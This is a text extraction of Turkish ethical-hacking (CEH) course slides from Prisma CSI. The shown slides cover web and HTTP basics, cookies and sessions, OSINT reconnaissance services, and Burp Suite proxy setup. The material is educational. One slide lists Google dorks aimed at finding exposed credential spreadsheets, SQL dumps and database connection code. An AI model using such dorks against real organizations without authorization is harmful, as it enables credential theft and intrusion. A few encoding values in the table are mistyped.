Beyaz Şapkalı Hacker CEH Eğitimi - Web Uygulama Güvenliği1. www.prismacsi.com
© All Rights Reserved.
1
www.prismacsi.com
© All Rights Reserved.
1
www.prismacsi.com
© All Rights Reserved.
1
www.prismacsi.com
© All Rights Reserved.
1
Uygulamalı Beyaz Şapkalı Hacker Eğitimi #9
Web Uygulama Güvenliği
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye
https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
2. www.prismacsi.com
© All Rights Reserved.
2
www.prismacsi.com
© All Rights Reserved.
2
www.prismacsi.com
© All Rights Reserved.
2
www.prismacsi.com
© All Rights Reserved.
2
Başlıklar
• Web Teknolojileri
• Mimari
• HTML
• HTML Encoding
• URL
• URL Encoding
• HTTP Temelleri
• HTTP Protokolü
• HTTP Durum Kodları
• Cookie
• Session
• Bilgi Toplama
3. www.prismacsi.com
© All Rights Reserved.
3
www.prismacsi.com
© All Rights Reserved.
3
www.prismacsi.com
© All Rights Reserved.
3
www.prismacsi.com
© All Rights Reserved.
3
Başlıklar
• Burp Suite
• Zafiyetler
• SQL Injection
• Cross Site Scripting
• Insecure Direct Object References (IDOR)
• Cross Site Request Forgery (CSRF)
• File Upload
• File Inclusion
• Command Injection
• Uygulama Sunucu Zafiyetleri
• DoS Zafiyetleri
4. www.prismacsi.com
© All Rights Reserved.
4
www.prismacsi.com
© All Rights Reserved.
4
www.prismacsi.com
© All Rights Reserved.
4
www.prismacsi.com
© All Rights Reserved.
4
Başlıklar
• OWASP TOP 10
• Otomatize Zafiyet Keşfi
• Netsparker
• Acunetix
• Burpsuite
• Arachni
• Nessus
• Nikto
• Kullanışlı Firefox Eklentileri
5. www.prismacsi.com
© All Rights Reserved.
5
www.prismacsi.com
© All Rights Reserved.
5
www.prismacsi.com
© All Rights Reserved.
5
www.prismacsi.com
© All Rights Reserved.
5
Web Teknolojileri
6. www.prismacsi.com
© All Rights Reserved.
6
www.prismacsi.com
© All Rights Reserved.
6
www.prismacsi.com
© All Rights Reserved.
6
www.prismacsi.com
© All Rights Reserved.
6
Web Teknolojileri – Mimari
• Çoğu Web Uygulaması 3 temel bileşene dayanmaktadır:
• İstemci: Büyük oranda web tarayıcı.
• Sunucu: İstemciden gelen istekleri karşılayan bir sunucu.
• Veritabanı: Verilerin alınıp kaydedildiği ve çağırıldığı veritabanı.
İstemci Sunucu Veritabanı
7. www.prismacsi.com
© All Rights Reserved.
7
www.prismacsi.com
© All Rights Reserved.
7
www.prismacsi.com
© All Rights Reserved.
7
www.prismacsi.com
© All Rights Reserved.
7
Web Teknolojileri – Mimari
• İstemci taraflı teknolojiler:
• İstemci taraflı teknolojiler internet kullanıcıları tarafından günlük olarak kullanılan
teknolojilerdir. Firefox, Chrome, Opera, Safari gibi tarayıcılar ile birlikte kullanılan
HTML, Javascript, Flash bunlara örnek olarak verilebilir.
İstemci
8. www.prismacsi.com
© All Rights Reserved.
8
www.prismacsi.com
© All Rights Reserved.
8
www.prismacsi.com
© All Rights Reserved.
8
www.prismacsi.com
© All Rights Reserved.
8
Web Teknolojileri – Mimari
• Sunucu taraflı teknolojiler:
• İstemcilere bilgi sunan ve istemciden gelen verilerin işlenmesini sağlayan teknolojilerdir.
• Çok fazla ve farklı teknolojiler burada bulunur. Bundan dolayı bu kısımda zafiyet
bulunma olasılığı yüksektir.
• Başlıca sunucu taraflı teknolojiler:
• Apache, Nginx, IIS gibi web sunucuları
• Tomcat, JBoss, Oracle Application Server gibi uygulama sunucuları
• C#, PHP, Java, Python, Ruby, ASP başlıca kullanılan dillerdir.
Sunucu
9. www.prismacsi.com
© All Rights Reserved.
9
www.prismacsi.com
© All Rights Reserved.
9
www.prismacsi.com
© All Rights Reserved.
9
www.prismacsi.com
© All Rights Reserved.
9
Web Teknolojileri – Mimari
• Veritabanı:
• Veritabanları uygulama sunucularıyla aynı sunucu üzerinde bulunacağı gibi güvenlik
sebebiyle başka sunucular üzerinde de bulunabilir.
• Başlıca veritabanı teknolojileri:
• İlişkisel: MySQL, Microsoft SQL Server, Oracle, PostgreSQL
• NoSQL: MongoDB, CouchDB
Veritabanı
10. www.prismacsi.com
© All Rights Reserved.
10
www.prismacsi.com
© All Rights Reserved.
10
www.prismacsi.com
© All Rights Reserved.
10
www.prismacsi.com
© All Rights Reserved.
10
Web Teknolojileri – Mimari
Client Side Server Side DBMS
11. www.prismacsi.com
© All Rights Reserved.
11
www.prismacsi.com
© All Rights Reserved.
11
www.prismacsi.com
© All Rights Reserved.
11
www.prismacsi.com
© All Rights Reserved.
11
Web Teknolojileri – HTML
• HTML (Hyper Text Markup Language) internet üzerinde web sayfası oluşturmak için
kullanılan bir betik dilidir.
• HTML dosyaları sunucu bilgisayarın sabit diskinde .html ya da .htm uzantısı ile saklanır.
• Yazılan HTML dosyaları düz yazı formatındadır.
• HTML kodları tarayıcılar aracılığıyla okunup, yorumlanır ve görsel olarak sunulur.
• HTML dosyalarının aktarımı için HTTP (Hyper Text Transfer Protocol) kullanılır.
12. www.prismacsi.com
© All Rights Reserved.
12
www.prismacsi.com
© All Rights Reserved.
12
www.prismacsi.com
© All Rights Reserved.
12
www.prismacsi.com
© All Rights Reserved.
12
Web Teknolojileri – HTML
<!DOCTYPE html>
<html>
<head>
<title> Prisma CSI </title>
</head>
<body>
<h1> Başlık </h1>
<p> Paragraf </p>
<img src="https://www.prismacsi.com/logo.png">
</body>
</html>
13. www.prismacsi.com
© All Rights Reserved.
13
www.prismacsi.com
© All Rights Reserved.
13
www.prismacsi.com
© All Rights Reserved.
13
www.prismacsi.com
© All Rights Reserved.
13
Web Teknolojileri – HTML
• Temel HTML Elementleri:
• head
• title
• body
• script
• style
• table
• a
• img
• iframe
• <! - - yorum satırı - - >
14. www.prismacsi.com
© All Rights Reserved.
14
www.prismacsi.com
© All Rights Reserved.
14
www.prismacsi.com
© All Rights Reserved.
14
www.prismacsi.com
© All Rights Reserved.
14
Web Teknolojileri – HTML
<a> (anchor)
• Linkleme işlemi için kullanılır.
<a href="www.prismacsi.com"> PRISMA CSI </a>
15. www.prismacsi.com
© All Rights Reserved.
15
www.prismacsi.com
© All Rights Reserved.
15
www.prismacsi.com
© All Rights Reserved.
15
www.prismacsi.com
© All Rights Reserved.
15
Web Teknolojileri – HTML
<img>
• Sayfaya resim eklemek için kullanılır.
• Soru: Nasıl kötüye kullanılır?
<img src="https://www.prismacsi.com/logo.png" height="200">
16. www.prismacsi.com
© All Rights Reserved.
16
www.prismacsi.com
© All Rights Reserved.
16
www.prismacsi.com
© All Rights Reserved.
16
www.prismacsi.com
© All Rights Reserved.
16
Web Teknolojileri – HTML
<iframe>
• HTML sayfa içerisinde başka bir siteyi çağırmak için kullanılır.
17. www.prismacsi.com
© All Rights Reserved.
17
www.prismacsi.com
© All Rights Reserved.
17
www.prismacsi.com
© All Rights Reserved.
17
www.prismacsi.com
© All Rights Reserved.
17
Web Teknolojileri – HTML
<!- - - ->
• Tarayıcılar tarafından işletilmeyen, yazılımcıların genellikle kendilerine hatırlatma amacıyla
koyduğu yorum satırlarıdır.
18. www.prismacsi.com
© All Rights Reserved.
18
www.prismacsi.com
© All Rights Reserved.
18
www.prismacsi.com
© All Rights Reserved.
18
www.prismacsi.com
© All Rights Reserved.
18
Web Teknolojileri – HTML Encoding
• HTML Encoding
' ' apostrophe
" " quotation
< < less-than
> > greater-than
& & Ampersand
19. www.prismacsi.com
© All Rights Reserved.
19
www.prismacsi.com
© All Rights Reserved.
19
www.prismacsi.com
© All Rights Reserved.
19
www.prismacsi.com
© All Rights Reserved.
19
Web Teknolojileri – HTML Encoding
• HTML Encoding
20. www.prismacsi.com
© All Rights Reserved.
20
www.prismacsi.com
© All Rights Reserved.
20
www.prismacsi.com
© All Rights Reserved.
20
www.prismacsi.com
© All Rights Reserved.
20
Web Teknolojileri – URL
• URL (Uniform Resource Locator)
• Web uygulamalarına erişim için adresleme standardı
• Rezerve Karakterler: ! * ’ ( ) ; , : @ & = + $ / ? % # [ ]
• protokol://host:port/doküman_yolu?parametre=değer#fragment
protokol http, https, ftp
host:port prismacsi.com:80
doküman_yolu /, /index.html, /egitimler/index.html
?parametre=değer ?egitim=hackercamp
#fragment #linux
21. www.prismacsi.com
© All Rights Reserved.
21
www.prismacsi.com
© All Rights Reserved.
21
www.prismacsi.com
© All Rights Reserved.
21
www.prismacsi.com
© All Rights Reserved.
21
Web Teknolojileri – URL Encoding
• https://www.w3schools.com/tags/ref_urlencode.asp
' %27
" %22
< %3C
> &3E
/ %2F
( %28
) %29
: &3A
; &3B
A %41
22. www.prismacsi.com
© All Rights Reserved.
22
www.prismacsi.com
© All Rights Reserved.
22
www.prismacsi.com
© All Rights Reserved.
22
www.prismacsi.com
© All Rights Reserved.
22
Web Teknolojileri – URL Encoding
• https%3A%2F%2Fwww.prismacsi.com%2F%3Fsearch%3Dtest%27mesaj%22%3B%23
• https://www.prismacsi.com/?search=test'mesaj";#
: / / / ? = " ;' #
23. www.prismacsi.com
© All Rights Reserved.
23
www.prismacsi.com
© All Rights Reserved.
23
www.prismacsi.com
© All Rights Reserved.
23
www.prismacsi.com
© All Rights Reserved.
23
HTTP Temelleri
24. www.prismacsi.com
© All Rights Reserved.
24
www.prismacsi.com
© All Rights Reserved.
24
www.prismacsi.com
© All Rights Reserved.
24
www.prismacsi.com
© All Rights Reserved.
24
HTTP Temelleri
• HTTP protokolü genel olarak web tarayıcılarının kullandığı bir protokoldür.
• Kullanıcı ve Web Uygulaması arasındaki trafik genellikle HTTP protokolü üzerinden gerçekleşir.
• Default olarak TCP 80 portunda çalışır.
• Plaintext’dir.
• İstek ve cevap şeklinde çalışır.
• Bu kullanıcı şuan sistemde mi? Yetkili mi? Gibi durum kontrolü yapmaz.
• Durum kontrolü yapmadığı için Cookie ve Session mekanizmaları kullanılır.
• Cevaplarda durum kodları bulunur.
25. www.prismacsi.com
© All Rights Reserved.
25
www.prismacsi.com
© All Rights Reserved.
25
www.prismacsi.com
© All Rights Reserved.
25
www.prismacsi.com
© All Rights Reserved.
25
HTTP Temelleri
• Header ve Body olarak iki ana bölümden oluşur:
HEADERSrn
rn
MESSAGE BODYrn
POST /sayfa.php HTTP/1.1
User-Agent: Mozilla/4.0
Host: facebook.com
Content-Length=15
isim=Hakan
HEADER
MESSAGE BODY
26. www.prismacsi.com
© All Rights Reserved.
26
www.prismacsi.com
© All Rights Reserved.
26
www.prismacsi.com
© All Rights Reserved.
26
www.prismacsi.com
© All Rights Reserved.
26
HTTP Temelleri
• Örnek: Google.com’a gitmek için nasıl bir istekte bulunuyoruz?
GET / HTTP/1.1
Host: google.com.tr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: NID=111=…
Connection: close
27. www.prismacsi.com
© All Rights Reserved.
27
www.prismacsi.com
© All Rights Reserved.
27
www.prismacsi.com
© All Rights Reserved.
27
www.prismacsi.com
© All Rights Reserved.
27
HTTP Temelleri
• Request metodumuzdur.
• Sunucudan ne tarz bir istekte bulunduğumuzu belirtiriz.
GET /sayfa.php?isim=Hakan HTTP/1.1
User-Agent: Mozilla/4.0
Host: facebook.com
• GET dışında POST, PUT, DELETE, OPTIONS gibi farklı metodlarda mevcuttur.
28. www.prismacsi.com
© All Rights Reserved.
28
www.prismacsi.com
© All Rights Reserved.
28
www.prismacsi.com
© All Rights Reserved.
28
www.prismacsi.com
© All Rights Reserved.
28
HTTP Temelleri
• PATH belirtir.
• Hangi dizine istek yapılıyorsa o yazılır.
• Örneğin Google.com/translate/index.php için yapılacak olan GET isteği:
GET /translate/index.php HTTP/1.1
Şeklinde olacaktır.
• Ana dizin her zaman / ile belirtilir.
29. www.prismacsi.com
© All Rights Reserved.
29
www.prismacsi.com
© All Rights Reserved.
29
www.prismacsi.com
© All Rights Reserved.
29
www.prismacsi.com
© All Rights Reserved.
29
HTTP Temelleri
• Protokol bilgisini belirtir.
• Güncel olarak HTTP 1.1 protokolü kullanılmaktadır.
30. www.prismacsi.com
© All Rights Reserved.
30
www.prismacsi.com
© All Rights Reserved.
30
www.prismacsi.com
© All Rights Reserved.
30
www.prismacsi.com
© All Rights Reserved.
30
POST
• GET ile aynı işlemi yapar fakat POST ile daha fazla veri gönderilebilir, veriler arka planda HTTP
isteğinin body kısmında gönderilir, URL'de bu değerler gözükmez
• Örneğin File Upload işlemleri POST metodunu kullanırlar
POST /sayfa.php HTTP/1.1
User-Agent: Mozilla/4.0
Host: facebook.com
Content-Length=15
...
isim=Hakan
31. www.prismacsi.com
© All Rights Reserved.
31
www.prismacsi.com
© All Rights Reserved.
31
www.prismacsi.com
© All Rights Reserved.
31
www.prismacsi.com
© All Rights Reserved.
31
HTTP Temelleri
Host: google.com.tr
• Bir IP adresi üzeride birden fazla web sitesi barınıyor olabilir.
• Host başlık bilgisi sunucu üzerinde hangi siteye istek yapıldığını belirtir.
• HTTP Başlıkları
• Başlık_İsmi:Başlık Değeri şeklinde yazılır.
32. www.prismacsi.com
© All Rights Reserved.
32
www.prismacsi.com
© All Rights Reserved.
32
www.prismacsi.com
© All Rights Reserved.
32
www.prismacsi.com
© All Rights Reserved.
32
HTTP Temelleri
• Durum Kodları
• 1xx : Bilgi
• 2xx : Başarılı
• 200 OK
• 3xx : Yönlendirme
• 4xx : Sunucu taraflı bir hata
• 401 Unauthorized
• 403 Forbidden
• 404 Not found
• 5xx : Server taraflı bir hata
33. www.prismacsi.com
© All Rights Reserved.
33
www.prismacsi.com
© All Rights Reserved.
33
www.prismacsi.com
© All Rights Reserved.
33
www.prismacsi.com
© All Rights Reserved.
33
HTTP Temelleri
• Cookie
• Oturum bilgileri browser tarafından saklanır ve oturumu tanımlayan değerlerdir.
• Kullanıcının bilgilerini barındırır.
• Cookie HTTP başlığı ile alınır ve yollanır.
• Cookie sunucu tarafından tanımlanır.
34. www.prismacsi.com
© All Rights Reserved.
34
www.prismacsi.com
© All Rights Reserved.
34
www.prismacsi.com
© All Rights Reserved.
34
www.prismacsi.com
© All Rights Reserved.
34
HTTP Temelleri
• Cookie
• Cookieler Set-Cookie başlığı ile atanır.
• Set-Cookie: CookieName=CookieValue; expires=tarih; domain=alan adı; path=path; secure;
• Domain: Cookie ayarlandıktan sonra hangi domain’e istek yapıldığında bu cookie’nin ekleneceğini
belirten değerdir.
• Path: Cookie’nin hangi path’e istek yapıldığında ekleneceğini belirten değerdir.
• Expires: Cookie’nin ne zaman geçersiz olacağını belirten değerdir. Belirtilmediği takdirde browser
kapandıktan sonra Cookie silinir.
• Secure: Cookie’nin yalnızca HTTPS bağlantılarda gönderilmesini gerektiğini belirten değerdir.
• HttpOnly: Cookie’nin yalnızca HTTP istekleri sırasında kullanılacağını belirtir. Javascript gibi çağrılara
eklenmez.
35. www.prismacsi.com
© All Rights Reserved.
35
www.prismacsi.com
© All Rights Reserved.
35
www.prismacsi.com
© All Rights Reserved.
35
www.prismacsi.com
© All Rights Reserved.
35
HTTP Temelleri
• Session
• Oturum bilgileri sunucu tarafında farklı noktalarda saklanabilir:
• Veritabanında
• Dosya üzerinde
• İstemci tarafında Session ID saklanır
• Session ID'ye sahip herkes bu hesaplara erişim sağlayabilir
36. www.prismacsi.com
© All Rights Reserved.
36
www.prismacsi.com
© All Rights Reserved.
36
www.prismacsi.com
© All Rights Reserved.
36
www.prismacsi.com
© All Rights Reserved.
36
Bilgi Toplama
37. www.prismacsi.com
© All Rights Reserved.
37
www.prismacsi.com
© All Rights Reserved.
37
www.prismacsi.com
© All Rights Reserved.
37
www.prismacsi.com
© All Rights Reserved.
37
IP Aralığı Tespiti - Uygulama
ripe.net
38. www.prismacsi.com
© All Rights Reserved.
38
www.prismacsi.com
© All Rights Reserved.
38
www.prismacsi.com
© All Rights Reserved.
38
www.prismacsi.com
© All Rights Reserved.
38
Whois Analizi - Uygulama
who.is
39. www.prismacsi.com
© All Rights Reserved.
39
www.prismacsi.com
© All Rights Reserved.
39
www.prismacsi.com
© All Rights Reserved.
39
www.prismacsi.com
© All Rights Reserved.
39
Reverse Whois Analizi - Uygulama
whoisology.com
40. www.prismacsi.com
© All Rights Reserved.
40
www.prismacsi.com
© All Rights Reserved.
40
www.prismacsi.com
© All Rights Reserved.
40
www.prismacsi.com
© All Rights Reserved.
40
Subdomain, Virtualhost ve Email Keşfi - Uygulama
theharvester
41. www.prismacsi.com
© All Rights Reserved.
41
www.prismacsi.com
© All Rights Reserved.
41
www.prismacsi.com
© All Rights Reserved.
41
www.prismacsi.com
© All Rights Reserved.
41
Aquatone-Discover - Uygulama
aquatone-discover –d yandex.com
42. www.prismacsi.com
© All Rights Reserved.
42
www.prismacsi.com
© All Rights Reserved.
42
www.prismacsi.com
© All Rights Reserved.
42
www.prismacsi.com
© All Rights Reserved.
42
Sublist3r - Uygulama
https://github.com/aboul3la/Sublist3r
43. www.prismacsi.com
© All Rights Reserved.
43
www.prismacsi.com
© All Rights Reserved.
43
www.prismacsi.com
© All Rights Reserved.
43
www.prismacsi.com
© All Rights Reserved.
43
DNS Bilgileri - Uygulama
robtex.com
44. www.prismacsi.com
© All Rights Reserved.
44
www.prismacsi.com
© All Rights Reserved.
44
www.prismacsi.com
© All Rights Reserved.
44
www.prismacsi.com
© All Rights Reserved.
44
DNS Bilgileri - Uygulama
dnsdumpster.com
45. www.prismacsi.com
© All Rights Reserved.
45
www.prismacsi.com
© All Rights Reserved.
45
www.prismacsi.com
© All Rights Reserved.
45
www.prismacsi.com
© All Rights Reserved.
45
DNS Bilgileri - Uygulama
mxtoolbox.com
46. www.prismacsi.com
© All Rights Reserved.
46
www.prismacsi.com
© All Rights Reserved.
46
www.prismacsi.com
© All Rights Reserved.
46
www.prismacsi.com
© All Rights Reserved.
46
DNS Bilgileri - Uygulama
dnsstuff.com
47. www.prismacsi.com
© All Rights Reserved.
47
www.prismacsi.com
© All Rights Reserved.
47
www.prismacsi.com
© All Rights Reserved.
47
www.prismacsi.com
© All Rights Reserved.
47
DNS Bilgileri - Uygulama
dig
48. www.prismacsi.com
© All Rights Reserved.
48
www.prismacsi.com
© All Rights Reserved.
48
www.prismacsi.com
© All Rights Reserved.
48
www.prismacsi.com
© All Rights Reserved.
48
DNS Bilgileri - Uygulama
dig
49. www.prismacsi.com
© All Rights Reserved.
49
www.prismacsi.com
© All Rights Reserved.
49
www.prismacsi.com
© All Rights Reserved.
49
www.prismacsi.com
© All Rights Reserved.
49
Fierce DNS Keşif - Uygulama
50. www.prismacsi.com
© All Rights Reserved.
50
www.prismacsi.com
© All Rights Reserved.
50
www.prismacsi.com
© All Rights Reserved.
50
www.prismacsi.com
© All Rights Reserved.
50
Yougetsignal - Uygulama
yougetsignal.com
51. www.prismacsi.com
© All Rights Reserved.
51
www.prismacsi.com
© All Rights Reserved.
51
www.prismacsi.com
© All Rights Reserved.
51
www.prismacsi.com
© All Rights Reserved.
51
Bing - Uygulama
bing.com
52. www.prismacsi.com
© All Rights Reserved.
52
www.prismacsi.com
© All Rights Reserved.
52
www.prismacsi.com
© All Rights Reserved.
52
www.prismacsi.com
© All Rights Reserved.
52
Netcraft - Uygulama
netcraft.com
53. www.prismacsi.com
© All Rights Reserved.
53
www.prismacsi.com
© All Rights Reserved.
53
www.prismacsi.com
© All Rights Reserved.
53
www.prismacsi.com
© All Rights Reserved.
53
Wayback Machine - Uygulama
Archive.org
54. www.prismacsi.com
© All Rights Reserved.
54
www.prismacsi.com
© All Rights Reserved.
54
www.prismacsi.com
© All Rights Reserved.
54
www.prismacsi.com
© All Rights Reserved.
54
Wayback Machine - Uygulama
archive.org
55. www.prismacsi.com
© All Rights Reserved.
55
www.prismacsi.com
© All Rights Reserved.
55
www.prismacsi.com
© All Rights Reserved.
55
www.prismacsi.com
© All Rights Reserved.
55
Shodan - Uygulama
shodan.io
56. www.prismacsi.com
© All Rights Reserved.
56
www.prismacsi.com
© All Rights Reserved.
56
www.prismacsi.com
© All Rights Reserved.
56
www.prismacsi.com
© All Rights Reserved.
56
Censys - Uygulama
censys.io
57. www.prismacsi.com
© All Rights Reserved.
57
www.prismacsi.com
© All Rights Reserved.
57
www.prismacsi.com
© All Rights Reserved.
57
www.prismacsi.com
© All Rights Reserved.
57
Haveibeenpwned - Uygulama
haveibeenpwned.com
58. www.prismacsi.com
© All Rights Reserved.
58
www.prismacsi.com
© All Rights Reserved.
58
www.prismacsi.com
© All Rights Reserved.
58
www.prismacsi.com
© All Rights Reserved.
58
Serversniff - Uygulama
• Online Araştırma Kaynakları – Serversniff.net
59. www.prismacsi.com
© All Rights Reserved.
59
www.prismacsi.com
© All Rights Reserved.
59
www.prismacsi.com
© All Rights Reserved.
59
www.prismacsi.com
© All Rights Reserved.
59
Hackertarget - Uygulama
• Online Araştırma Kaynakları – Hackertarget.com
60. www.prismacsi.com
© All Rights Reserved.
60
www.prismacsi.com
© All Rights Reserved.
60
www.prismacsi.com
© All Rights Reserved.
60
www.prismacsi.com
© All Rights Reserved.
60
Alexa - Uygulama
alexa.com
61. www.prismacsi.com
© All Rights Reserved.
61
www.prismacsi.com
© All Rights Reserved.
61
www.prismacsi.com
© All Rights Reserved.
61
www.prismacsi.com
© All Rights Reserved.
61
Pastebin- Uygulama
pastebin.com
62. www.prismacsi.com
© All Rights Reserved.
62
www.prismacsi.com
© All Rights Reserved.
62
www.prismacsi.com
© All Rights Reserved.
62
www.prismacsi.com
© All Rights Reserved.
62
Pastebin Search - Uygulama
https://inteltechniques.com/OSINT/pastebins.html
63. www.prismacsi.com
© All Rights Reserved.
63
www.prismacsi.com
© All Rights Reserved.
63
www.prismacsi.com
© All Rights Reserved.
63
www.prismacsi.com
© All Rights Reserved.
63
Stackoverflow - Uygulama
stackoverflow.com
64. www.prismacsi.com
© All Rights Reserved.
64
www.prismacsi.com
© All Rights Reserved.
64
www.prismacsi.com
© All Rights Reserved.
64
www.prismacsi.com
© All Rights Reserved.
64
Github - Uygulama
github.com
65. www.prismacsi.com
© All Rights Reserved.
65
www.prismacsi.com
© All Rights Reserved.
65
www.prismacsi.com
© All Rights Reserved.
65
www.prismacsi.com
© All Rights Reserved.
65
Google Hacking DB
• Google Hacking DB
• Dork kavramı
• Sık kullanılan parametreler
• Site , -site, Inurl, intitle, intext
• Filetype: , ext : , cache:
66. www.prismacsi.com
© All Rights Reserved.
66
www.prismacsi.com
© All Rights Reserved.
66
www.prismacsi.com
© All Rights Reserved.
66
www.prismacsi.com
© All Rights Reserved.
66
Google Hacking DB
• Örnek Dorklar
• Intitle:index.of url:domain.com
• Intitle:index.of inurl:domain.com filetype:sql
• Site:domain.com –site:www.domain.com unique
• Filetype:log intext:”putty”
• Filetype:xls “username | password”
• Ext:phps “mysql_connect”
• inurl:/view/index/shtml
67. www.prismacsi.com
© All Rights Reserved.
67
www.prismacsi.com
© All Rights Reserved.
67
www.prismacsi.com
© All Rights Reserved.
67
www.prismacsi.com
© All Rights Reserved.
67
Google Hacking DB - Uygulama
• https://www.exploit-db.com/google-hacking-database/
68. www.prismacsi.com
© All Rights Reserved.
68
www.prismacsi.com
© All Rights Reserved.
68
www.prismacsi.com
© All Rights Reserved.
68
www.prismacsi.com
© All Rights Reserved.
68
Google Hacking DB - Uygulama
• Google Images
69. www.prismacsi.com
© All Rights Reserved.
69
www.prismacsi.com
© All Rights Reserved.
69
www.prismacsi.com
© All Rights Reserved.
69
www.prismacsi.com
© All Rights Reserved.
69
Ek Araçların Listesi
Bu araçlar ile manuel olarak ele alınan süreçlerin büyük bölümü için otomatize analiz yapılabilir.
• Spiderfoot
• Recon-ng
• Foca
• Metagoofil
• Maltego
70. www.prismacsi.com
© All Rights Reserved.
70
www.prismacsi.com
© All Rights Reserved.
70
www.prismacsi.com
© All Rights Reserved.
70
www.prismacsi.com
© All Rights Reserved.
70
Burp Suite
71. www.prismacsi.com
© All Rights Reserved.
71
www.prismacsi.com
© All Rights Reserved.
71
www.prismacsi.com
© All Rights Reserved.
71
www.prismacsi.com
© All Rights Reserved.
71
Burp Suite Nedir?
• Burp Suite Web Uygulama Güvenliği testlerinde yaygın olarak kullanılan HTTP Proxy araçlarından biridir.
• Ticari bir üründür.
• Kısıtlı imkanların bulunduğu ücretsiz sürümü de bulunmaktadır.
• https://portswigger.net/burp/communitydownload adresinden indirilebilir.
72. www.prismacsi.com
© All Rights Reserved.
72
www.prismacsi.com
© All Rights Reserved.
72
www.prismacsi.com
© All Rights Reserved.
72
www.prismacsi.com
© All Rights Reserved.
72
Burp Suite Konfigürasyonu
• Burp Suite standart olarak gelen ayarlarda 127.0.0.1:8080 adresini dinlemektedir.
73. www.prismacsi.com
© All Rights Reserved.
73
www.prismacsi.com
© All Rights Reserved.
73
www.prismacsi.com
© All Rights Reserved.
73
www.prismacsi.com
© All Rights Reserved.
73
Burp Suite Konfigürasyonu
• Tarayıcımızın Ayarlar - Gelişmiş - Bağlantı Ayarlarından 127.0.0.1:8080 yönlendirilir.
74. www.prismacsi.com
© All Rights Reserved.
74
www.prismacsi.com
© All Rights Reserved.
74
www.prismacsi.com
© All Rights Reserved.
74
www.prismacsi.com
© All Rights Reserved.
74
Burp Suite Konfigürasyonu
• Tarayıcıdan gelen trafiğin Burp üzerinde görüntülenmesi aşağıdaki gibidir
75. www.prismacsi.com
© All Rights Reserved.
75
www.prismacsi.com
© All Rights Reserved.
75
www.prismacsi.com
© All Rights Reserved.
75
www.prismacsi.com
© All Rights Reserved.
75
Burp Suite Sertifika Konfigürasyonu
• SSL Trafiğinin dinlenmesi için CA sertifikasının yüklenmesi gerekmektedir.
76. www.prismacsi.com
© All Rights Reserved.
76
www.prismacsi.com
© All Rights Reserved.
76
www.prismacsi.com
© All Rights Reserved.
76
www.prismacsi.com
© All Rights Reserved.
76
Burp Suite Sertifika Konfigürasyonu
• Burp Suite açtıktan sonra tarayıdan http://burp adresine giderek CA CERTIFICATE butonuna tıklayıp sertifika
indirilir.
77. www.prismacsi.com
© All Rights Reserved.
77
www.prismacsi.com
© All Rights Reserved.
77
www.prismacsi.com
© All Rights Reserved.
77
www.prismacsi.com
© All Rights Reserved.
77
Burp Suite Sertifika Konfigürasyonu
• Tercihler-Gelişmiş-Sertifikalar-Sertifikaları Göster-İçe Aktar` a tıklayıp indirdiğimiz sertifikayı tarayıcımıza
ekleyebiliriz.
78. www.prismacsi.com
© All Rights Reserved.
78
www.prismacsi.com
© All Rights Reserved.
78
www.prismacsi.com
© All Rights Reserved.
78
www.prismacsi.com
© All Rights Reserved.
78
Burp Suite Kullanımı
• Proxy sekmesi altında Intercept sekmesinde Forward butonu yardımı ile istek adrese iletilir.
79. www.prismacsi.com
© All Rights Reserved.
79
www.prismacsi.com
© All Rights Reserved.
79
www.prismacsi.com
© All Rights Reserved.
79
www.prismacsi.com
© All Rights Reserved.
79
Burp Suite Kullanımı
• Proxy sekmesi altında Intercept sekmesinde Drop butonu ile istek sonlandırılabilir.
80. www.prismacsi.com
© All Rights Reserved.
80
www.prismacsi.com
© All Rights Reserved.
80
www.prismacsi.com
© All Rights Reserved.
80
www.prismacsi.com
© All Rights Reserved.
80
Burp Suite Kullanımı
• Proxy sekmesi altında HTTP History sekmesinde yaptığımız istekleri görüntüleyebiliriz.
81. www.prismacsi.com
© All Rights Reserved.
81
www.prismacsi.com
© All Rights Reserved.
81
www.prismacsi.com
© All Rights Reserved.
81
www.prismacsi.com
© All Rights Reserved.
81
Burp Suite Site Map Kullanımı
• Target sekmesinde Site Map butonu yardımı ile hedef sitenin site haritasını görüntüleyebilirsiniz.
82. www.prismacsi.com
© All Rights Reserved.
82
www.prismacsi.com
© All Rights Reserved.
82
www.prismacsi.com
© All Rights Reserved.
82
www.prismacsi.com
© All Rights Reserved.
82
Burp Suite Scope Kullanımı
• Target -> Site Map sekmesinde URL lerden birine sağ tıkla Add to Scope seçeneğiyle listelemek istenilen adresler
Scope Sekmesine eklenir.
83. www.prismacsi.com
© All Rights Reserved.
83
www.prismacsi.com
© All Rights Reserved.
83
www.prismacsi.com
© All Rights Reserved.
83
www.prismacsi.com
© All Rights Reserved.
83
Burp Suite Scope Kullanımı
• Target sekmesinde Scope sekmesinde eklediğimiz URL’leri listeleyebiliriz
84. www.prismacsi.com
© All Rights Reserved.
84
www.prismacsi.com
© All Rights Reserved.
84
www.prismacsi.com
© All Rights Reserved.
84
www.prismacsi.com
© All Rights Reserved.
84
Burp Suite Spider Kullanımı
• Spider fonksiyonu Scope’a eklediğiniz siteleri dolaşarak sitedeki urlleri listelemektedir.
85. www.prismacsi.com
© All Rights Reserved.
85
www.prismacsi.com
© All Rights Reserved.
85
www.prismacsi.com
© All Rights Reserved.
85
www.prismacsi.com
© All Rights Reserved.
85
Burp Suite Spider Kullanımı
• Spider -> Options sekmesine geçip özelleştirebilecek ayarlar görüntülenir.
86. www.prismacsi.com
© All Rights Reserved.
86
www.prismacsi.com
© All Rights Reserved.
86
www.prismacsi.com
© All Rights Reserved.
86
www.prismacsi.com
© All Rights Reserved.
86
Burp Suite Spider - Crawler Ayarları
• Check robots.txt: robots.txt dosyasını kontrol etme durumu belirlenir.
87. www.prismacsi.com
© All Rights Reserved.
87
www.prismacsi.com
© All Rights Reserved.
87
www.prismacsi.com
© All Rights Reserved.
87
www.prismacsi.com
© All Rights Reserved.
87
Burp Suite Spider - Crawler Ayarları
• Detect custom "not found" responses: 404 sayfası keşfinin aktifleştirilmesi.
88. www.prismacsi.com
© All Rights Reserved.
88
www.prismacsi.com
© All Rights Reserved.
88
www.prismacsi.com
© All Rights Reserved.
88
www.prismacsi.com
